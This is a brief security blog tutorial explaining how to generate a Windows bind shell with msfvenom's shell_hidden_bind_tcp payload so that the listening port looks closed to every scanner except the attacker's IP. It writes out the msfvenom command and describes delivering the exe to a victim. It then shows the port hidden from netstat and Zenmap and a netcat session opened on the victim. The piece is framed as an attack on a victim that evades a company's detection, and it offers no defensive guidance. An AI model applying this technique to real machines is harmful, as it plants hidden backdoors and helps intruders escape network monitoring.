How to Hide Shellcode Behind Closed Port?

Every company has a variety of scanners for analyzing its network and identifying new or unknown open ports. It’s unthinkable to disguise the potentially malicious bind shellcode within that kind of setting and stay undetected by their scanners.

In this article, we will look at how one can hide Shellcode behind a closed port.

Hidden Bind TCP shell listens for connections from the host’s IP address (Ahost) and responds with an RST packet to other connections. It makes the port appear closed, allowing us to disguise the Shellcode.

Let’s dig it further!

With msfvenom, generate a payload for victim PC (Windows machine) utilizing shell_hidden _bind_tcp and output a file with .exe format.

msfvenom -p windows/shell_hidden_bind_tcp ahost=[Attacker’s IP] lport=4321 -f exe > file.exe

How to Hide Shellcode Behind Closed Port

Transfer the payload to the victim machine (here, I am using “cifs utils” to transmit the malicious payload.)

When the victim runs the file, it will start a new service with port number 4321 connected to the attacker’s IP.

For instance, if the victim executes the “netstat command” to check the active connections, then port 4321 somehow won’t have an IP address; that looks that specific local services are operating on local connections.

How to Hide Shellcode Behind Closed Port

And by chance, if the victim scans the ports through any scanner like Zenmap, then the malicious port will appear close on that tool as well.

How to Hide Shellcode Behind Closed Port2


When the attacker scans the target IP, the port will appear as open.

nmap -p [Port-num] [Target IP]

How to Hide Shellcode Behind Closed Port 3.png

An attacker can have a session on the victim machine using netcat as well.

How to Hide Shellcode Behind Closed Port 4


In this tutorial, we saw the sorcery of hiding a TCP Bind Shellcode behind a closed port. Using “msfvenom,” we created a payload, transferred it to the victim machine using “cifs utils,” and bang, we succeeded with an open port and a session of the victim machine using “netcat.”

Sana Qazi
Sana Qazi is a technical writer specialized in Information Security. She enjoys writing about technology and reading multiple genres like suspense. When not writing, she can be found traveling, dinning out, watching series etc. She manages her medium blog as well.

Most Popular

Why Is Mobile App Hacking Growing In Popularity?

A cybersecurity blog post released by Varonis in March 2021 revealed the shocking truth:  Because of the Covid-19 pandemic, a huge increase in breached...

Protecting Your ID Online in 2021

With recent large hacks and increasing sophisticated schemes, we should also be protecting ourselves with even more sophisticated defensive strategies to protect our identities...

Taking a Look at the Privacy Features of Monero

Many large cryptocurrencies available today market themselves as bastions of business transparency by making their transaction data pseudonymously available on immutable, public databases. Because...

Best Tips on Cybersecurity for Students

Students, teachers, and educational institutions can all be targeted by hackers. In fact, 87% of schools have experienced one or more successful cyberattacks. There is...